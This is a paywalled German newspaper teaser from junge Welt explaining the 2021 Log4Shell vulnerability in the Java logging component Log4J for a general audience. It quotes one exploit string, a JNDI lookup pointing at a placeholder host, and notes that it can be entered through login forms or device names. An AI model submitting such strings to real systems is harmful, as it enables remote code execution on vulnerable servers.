Jetzt drei Wochen gratis lesen.
Gegründet 1947 Dienstag, 5. Juli 2022, Nr. 153
Die junge Welt wird von 2640 GenossInnen herausgegeben
Jetzt drei Wochen gratis lesen. Jetzt drei Wochen gratis lesen.
Jetzt drei Wochen gratis lesen.
15.12.2021 / Feuilleton / Seite 14

Rotlicht: Log4Shell

Matthias Clausen

Softwareprobleme schaffen es nur selten in die Schlagzeilen. Beim jüngsten Fall »­Log4Shell« ist das anders, handelt es sich doch um einen Fehler, der dafür sorgt, dass mit einem ziemlich einfachen Angriff auf die Systeme der größten Webanwendungen beliebige Befehle ausgeführt werden können. Wie funktioniert das? Wie alle Texte kann man auch Programme in verschiedenen Sprachen verfassen. Eine dieser Sprachen ist Java. Damit ein Javaprogramm Logdateien produziert, wird dafür meist die Komponente »Log4J« verwendet. Diese sorgt nun für den Fehler, wenn es einen Eintrag mit einem Text wie »${jndi:ldap://beispiel.de}« protokollieren soll. Das kann man z. B. über ein Loginformular provozieren, denn fehlgeschlagene Anmeldeversuche werden häufig aufgezeichnet. Bei Apple hat es sogar gereicht, die Gerätebezeichnung in den I-Phone-Einstellungen entsprechend zu ändern. Das Javaprogramm führt dann alle Befehle aus, die es von der angegebenen Internetadresse herunterl...

Artikel-Länge: 3787 Zeichen

Dieser Beitrag ist gesperrt und nur für Onlineabonnenten lesbar. Die Tageszeitung junge Welt finanziert sich vor allem aus den Aboeinnahmen. Mit einem Onlineabo tragen Sie dazu bei, das Erscheinen der jungen Welt und ihre Unabhängigkeit zu sichern.

Für Unentschlossene gibt es die Tageszeitung junge Welt auch am Kiosk, für 1,90 € wochentags und 2,30 € am Wochenende. Alle belieferten Verkaufsstellen in Ihrer Nähe finden Sie hier.

Vollen Zugriff auf alle Artikel bietet das Onlineabo. Jetzt bestellen unter www.jungewelt.de/abo.

Unverzichtbar! Jetzt junge Welt stärken.

Bitte einloggen
Hilfe bei Einlog-Problemen

Abo abschließen

Gedruckt

Printabo

Sechs mal die Woche: Hintergrund und Analysen, Kultur, Wissenschaft und Politik. Und Samstag acht Seiten extra.

45,90 Euro/Monat Soli: 57,90 €, ermäßigt: 31,90 €

Online

Onlineabo

24/7: Sofortiger Zugang zu allen Artikeln und Beilagen. Downloads, Mailausgabe, Features, das ganze Archiv.

21,90 Euro/Monat Soli: 29,90 €, ermäßigt: 14,90 €

Verschenken

Geschenkabo

Anderen eine Freude machen: Verschenken Sie jetzt ein Abonnement der Printausgabe.

45,90 Euro/Monat Soli: 57,90 €, ermäßigt: 31,90 €